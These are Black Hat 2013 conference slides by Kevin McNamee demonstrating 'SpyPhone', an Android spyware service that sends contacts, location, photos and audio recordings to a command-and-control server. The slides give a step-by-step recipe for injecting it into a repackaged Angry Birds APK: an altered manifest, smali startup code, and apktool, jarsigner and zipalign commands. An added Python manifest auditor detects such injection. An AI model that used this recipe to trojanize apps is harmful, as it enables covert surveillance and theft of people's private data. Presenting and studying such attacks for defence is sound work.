How To Build A SpyPhone (Presentation Slides)


How to Build a SpyPhone

Black Hat 2013 - Kevin McNamee, Alcatel-Lucent

Agenda
- Introduction
- Demo of SpyPhone in Action
- SpyPhone Design
- Injecting SpyPhone Service into an App
- Conclusion & Questions

SpyPhone - Then

SpyPhone - Now

Surveillance - Then

Surveillance - Now (figure: the Internet)

Counter Measures - Then

Counter Measures - Now (figure: the Internet)

Smart Phone Has Access To
- GPS Location
- Internet (from almost anywhere)
- A Microphone
- A Camera
- Local Wifi Networks
- E-Mail
- Text Messages
- Phone Calls
- Contact List
- Personal Information

Smart Phone Is
A perfect cyber-espionage tool: it can be used to track the victim's location, download personal information, intercept and send messages, record their conversations and take pictures without them knowing. In the context of BYOD and APT, it makes a perfect platform for launching inside attacks on corporate or government networks.


Demo
Built an Android SpyPhone Service that can:
- Steal phone and contact information
- Report on location
- Execute commands from C&C server
- Display message on phone
- Send SMS to contacts
- Take pictures and send to C&C
- Record sound and send to C&C

SpyPhone Service is:
- Injected into legitimate version of Angry Birds
- Distributed from fake app store

Demo Shows
- Installation of infected application
- Sending information to C&C
- Locating the device
- Sending SMS
- Taking pictures
- Recording sound

(figures: C&C Server, C&C Protocol)


SpyPhone Design
Implemented as Android Service
- Self contained component
- Runs in background even when app is stopped.
- Starts at boot up
- Easy to inject into legitimate applications

Command & Control
HTTP to NodeJS Web Server
- update: send information to server
- toast: display message on screen
- shutdown: stop the bot
- sms: send SMS message to contacts
- location: send location information to server
- peep: take picture and send to server
- listen: record sound and send to server


Uses Standard Android APIs

User Information
import android.accounts.Account;
import android.accounts.AccountManager;

Phone & SMS
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;

Location
import android.location.Location;
import android.location.LocationListener;
import android.location.LocationManager;

Recording
import android.media.MediaRecorder;

Camera
import android.hardware.Camera;
import android.hardware.Camera.PictureCallback;
import android.hardware.Camera.PreviewCallback;
import android.hardware.Camera.Size;
import android.media.AudioManager;
import android.view.SurfaceHolder;
import android.view.SurfaceView;

Web C&C
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;


Injection Process
1. Use apktool to extract the components from the target app (in this case Angry Birds 2000).
apktool d AngryBirds.apk


Injection Process
2. Copy the smali code for the service to be injected into the smali directory structure. In our case it was in the directory example/android/droidwhisper.


Injection Process
3. Update the manifest to include the injected service and the permissions required by the injected service. The updated manifest in the case of Angry Birds is shown below. The slide's callouts: remember the app name (the main activity, com.rovio.ka3d.App) for later; define the Droidwhisper service; define the required permissions.

<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="2000" android:versionName="2.0.0" android:installLocation="auto" package="com.rovio.angrybirds" xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:label="@string/app_name" android:icon="@drawable/icon" android:debuggable="false">
        <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:name="com.rovio.ka3d.App" android:launchMode="singleTask" android:screenOrientation="landscape" android:configChanges="keyboardHidden|orientation">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        . . . (some lines missing) . . .
        <service android:name="com.example.android.droidwhisper.DictionarySvc">
            <intent-filter>
                <action android:name="com.rovio.ka3d.service.DICTIONARY_SERVICE" />
            </intent-filter>
        </service>
    </application>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-feature android:name="android.hardware.camera" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-sdk android:minSdkVersion="4" android:targetSdkVersion="13" />
</manifest>


Injection Process
4. Locate the onCreate function in the main activity of the target app. This can be found by looking in the manifest. In the case of Angry Birds this was com/rovio/ka3d/App, highlighted in the manifest file above. Add the following smali code just after the invoke-super call to onCreate.

new-instance v0, Landroid/content/Intent;
invoke-direct {v0}, Landroid/content/Intent;-><init>()V
.local v0, dictionaryIntent:Landroid/content/Intent;
const-string v1, "com.rovio.ka3d.service.DICTIONARY_SERVICE"
invoke-virtual {v0, v1}, Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent;
invoke-virtual {p0, v0}, Landroid/app/Activity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;


Injection Process
5. Rebuild the apk file using apktool.
apktool b AngryBirds birds.apk

6. Sign the APK file. (Any old certificate will do!)
jarsigner -verbose -keystore C:\kevin\keys birds.apk alias_name
You can verify the cert with:
jarsigner -verify -verbose -certs birds.apk

7. Optimize the APK file.
zipalign -v 4 birds.apk birds1.apk

8. Install and test the new application. The logcat command can be used in the adb shell to check for errors.
adb install birds1.apk
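A defender-side check, added here and not part of the deck: it walks a decoded manifest and flags the three things the repackaged Angry Birds manifest above gives away, a component class outside the vendor's namespace, a cluster of sensitive permissions combined with INTERNET, and duplicate permission entries left by hand editing. The vendor-prefix rule is a heuristic of mine, and the sample manifest is constructed from the one shown above.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace
# Permissions a game has no reason to hold; together with INTERNET they give a
# background service the capabilities the deck's SpyPhone service uses.
SENSITIVE = {
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.SEND_SMS": "send SMS",
}

def audit_manifest(xml_text):
    # Returns human-readable findings for a decoded (apktool) AndroidManifest.xml.
    root = ET.fromstring(xml_text)
    vendor = ".".join(root.get("package", "").split(".")[:2])  # e.g. com.rovio
    findings = []
    for comp in root.iter():
        if comp.tag not in ("activity", "service", "receiver"):
            continue
        name = comp.get(A + "name", "")
        # Heuristic (assumption): a component class outside the vendor namespace
        # was not written by the vendor; an injected service is the textbook case.
        if name.startswith(".") or name.startswith(vendor + "."):
            continue
        findings.append(f"foreign {comp.tag}: {name}")
        for act in comp.iter("action"):  # an intent-filter makes it reachable
            findings.append(f"  reachable via action {act.get(A + 'name')}")
    perms = [p.get(A + "name") for p in root.iter("uses-permission")]
    hits = [SENSITIVE[p] for p in perms if p in SENSITIVE]
    if hits and "android.permission.INTERNET" in perms:
        findings.append("network access plus: " + ", ".join(hits))
    for dup in sorted({p for p in perms if perms.count(p) > 1}):
        findings.append(f"duplicate permission: {dup}")  # hand-edited manifest
    return findings

# Constructed sample, cut down from the repackaged Angry Birds manifest above.
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.rovio.angrybirds">
  <application>
    <activity android:name="com.rovio.ka3d.App"/>
    <service android:name="com.example.android.droidwhisper.DictionarySvc">
      <intent-filter><action android:name="com.rovio.ka3d.service.DICTIONARY_SERVICE"/></intent-filter>
    </service>
  </application>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
</manifest>"""
```

Run `audit_manifest(SAMPLE)` on the sample: the genuine activity com.rovio.ka3d.App passes, while the injected service, its reachable action, the permission cluster and the duplicate entry are all reported.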


SpyPhone Market


Next...

Questions?